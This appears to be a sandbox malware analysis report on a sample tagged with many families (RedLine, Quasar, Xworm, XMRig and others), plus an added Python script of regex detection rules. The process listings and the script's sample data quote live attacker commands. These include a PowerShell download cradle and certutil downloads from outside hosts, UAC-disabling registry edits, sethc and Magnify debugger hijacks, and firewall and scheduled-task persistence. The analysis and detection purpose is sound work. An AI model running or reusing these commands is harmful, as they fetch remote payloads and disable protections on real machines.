Malware Analysis Report

2025-01-23 11:51

Sample ID 241129-j89bpsvnes
Target take3.exe
SHA256 c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags
pyinstaller ammyyadmin flawedammyy gh0strat lumma metasploit quasar ramnit redline xmrig xworm diamotrix office04 sgvp backdoor banker credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer trojan upx vmprotect worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

Threat Level: Known bad

The file take3.exe was found to be: Known bad.

Malicious Activity Summary

Ramnit family

MetaSploit

Flawedammyy family

Ammyy Admin

RedLine payload

Redline family

Detect Xworm Payload

Lumma Stealer, LummaC

Ammyyadmin family

Xworm

Xworm family

FlawedAmmyy RAT

Quasar payload

Gh0strat family

Metasploit family

Gh0strat

Lumma family

Ramnit

RedLine

Xmrig family

AmmyyAdmin payload

Quasar family

xmrig

Gh0st RAT payload

Quasar RAT

XMRig Miner payload

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Sets file to hidden

Modifies Windows Firewall

Uses browser remote debugging

Executes dropped EXE

VMProtect packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Access Token Manipulation: Create Process with Token

Program crash

Detects Pyinstaller

Event Triggered Execution: Accessibility Features

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-29 08:21

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-29 08:21

Reported

2024-11-29 08:22

Platform

win11-20241007-en

Max time kernel

5s

Max time network

50s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows; no details recorded)

Ramnit

trojan spyware stealer worm banker ramnit

Ramnit family

ramnit

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows; no details recorded)

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A (26 identical rows; the loaded DLL names are not recorded)

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A (6 identical rows; no details recorded)

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A (4 identical rows; the full URLs are not recorded)

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (16 identical rows; no details recorded)

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2280 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 4592 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4592 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4592 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4592 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 4592 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 4592 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 4592 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 4592 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 4592 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 4592 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
PID 4592 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
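
Added example (not part of this report, and not code from the sandbox that produced it): the Python script below turns the behaviours listed in these signatures into regular-expression rules and runs them over command lines copied from the Processes section of this report. Rule names are this example's own, not the sandbox's signature identifiers; the input list is the report's own command lines, except for one Chrome renderer line that is shortened for length. On real telemetry the same rules apply to the CommandLine field of Sysmon event 1 or Security event 4688 with command-line auditing enabled.

```python
import re
from collections import defaultdict

# Detection rules for process command lines. Each entry is (label, regex);
# a label may carry a {0} placeholder filled from the regex's first group.
# Rule names are this example's own; they are not the sandbox's signature IDs.
RULES = [
    ("uac_policy_disabled:{0}",
     re.compile(r'reg(?:\.exe)?\s+add\s+.*CurrentVersion\\Policies\\System.*'
                r'/v\s+"?(EnableLUA|ConsentPromptBehaviorAdmin|PromptOnSecureDesktop)"?.*'
                r'/d\s+"?0+"?', re.I)),
    ("ifeo_debugger_hijack:{0}",
     re.compile(r'Image File Execution Options\\([^"\\]+\.exe)".*/v\s+Debugger', re.I)),
    ("rdp_policy_change:{0}",
     re.compile(r'reg(?:\.exe)?\s+add\s+.*(?:Terminal Services|Terminal Server\\WinStations).*'
                r'/v\s+(fDenyTSConnections|fAllowUnsolicited|UserAuthentication|SecurityLayer)\b', re.I)),
    ("firewall_allow_program",
     re.compile(r'netsh\s+(?:advfirewall\s+)?firewall\s+add\s+(?:allowedprogram|rule)', re.I)),
    ("schtask_logon_highest",
     re.compile(r'schtasks.*?/create.*?/sc\s+onlogon.*?/rl\s+highest', re.I)),
    # Browser child processes inherit the switch, so only the parent process
    # (the line that carries no --type=) is reported.
    ("browser_remote_debugging",
     re.compile(r'(?:chrome|msedge)\.exe"?(?!.*--type=).*--remote-debugging-port=\d+', re.I)),
    ("powershell_download_cradle",
     re.compile(r'powershell.*(?:\bIEX\b|Invoke-Expression).*DownloadString\(', re.I)),
    ("powershell_download_to_disk",
     re.compile(r'powershell.*invoke-webrequest.*-outfile', re.I)),
    ("certutil_download",
     re.compile(r'certutil(?:\.exe)?\s+.*-urlcache.*-f\s+\S+', re.I)),
    ("mshta_runas_uac_prompt",
     re.compile(r'mshta\s+vbscript:.*shellexecute\(.*"runas"', re.I)),
    ("hidden_file_attribute",
     re.compile(r'\battrib\s+(?:\+[sh]\s+)*\+h\b', re.I)),
    ("ping_delay_then_delete",
     re.compile(r'\bping\s+\S+.*&&?\s*del\b', re.I)),
    # svchost.exe launched from anywhere but System32/SysWOW64 is masquerading.
    ("svchost_outside_system32",
     re.compile(r'^"?(?!C:\\Windows\\(?:System32|SysWOW64)\\)[^"]*\\svchost\.exe', re.I)),
]

# Command lines copied from the Processes section of this report. The
# renderer line (index 4) is shortened for length; nothing else is altered.
SAMPLE = [
    r'"C:\Users\Admin\AppData\Local\Temp\take3.exe"',
    r'"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe',
    r'mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9223 --lang=en-US',
    r"powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')",
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F',
    r'"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f',
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE',
    r'attrib +s +h e:\net',
    r'certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat',
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"',
    r'"C:\Users\Admin\AppData\Roaming\svchost.exe"',
    r'"C:\Windows\system32\svchost.exe"',
    r'powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"',
]


def classify(cmdline):
    """Return the technique labels matched by one command line."""
    hits = []
    for label, rx in RULES:
        m = rx.search(cmdline)
        if m:
            hits.append(label.format(*m.groups()))
    return hits


def scan(cmdlines):
    """Map each label to the command lines that triggered it."""
    report = defaultdict(list)
    for line in cmdlines:
        for label in classify(line):
            report[label].append(line)
    return dict(report)


def summarize():
    """Run the rules over the report's command lines."""
    return scan(SAMPLE)


if __name__ == "__main__":
    for label, lines in sorted(summarize().items()):
        print(label)
        for line in lines:
            print("    " + line[:100])
```

Two details matter in practice. Browser child processes (--type=renderer, --type=gpu-process and so on) inherit --remote-debugging-port from the parent, so the rule reports only the parent line; and the UAC and RDP rules key on the value name written, because reg.exe accepts its switches in any order and with or without quotes, as the report's own lines show (/v "EnableLUA" /t reg_dword /d 0 /F versus /v EnableLUA /t REG_DWORD /d 0 /f).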

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe

"C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe"

C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe

"C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"

C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe

"C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"

C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe

"C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe"

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\22.exe

"C:\Users\Admin\Downloads\UrlHausFiles\22.exe"

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD18.tmp\AD19.tmp\AD1A.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2080 -ip 2080

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 396

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB70.tmp\BB71.tmp\BB72.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\B8C2.tmp\B8C3.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff81b4cc40,0x7fff81b4cc4c,0x7fff81b4cc58

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Users\Admin\AppData\Local\Temp\C18B.tmp.x.exe

"C:\Users\Admin\AppData\Local\Temp\C18B.tmp.x.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C4A8.tmp\C4A9.tmp\C4AA.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2488 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3040,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4496 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Windows\system32\attrib.exe

attrib +s +h e:\net

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

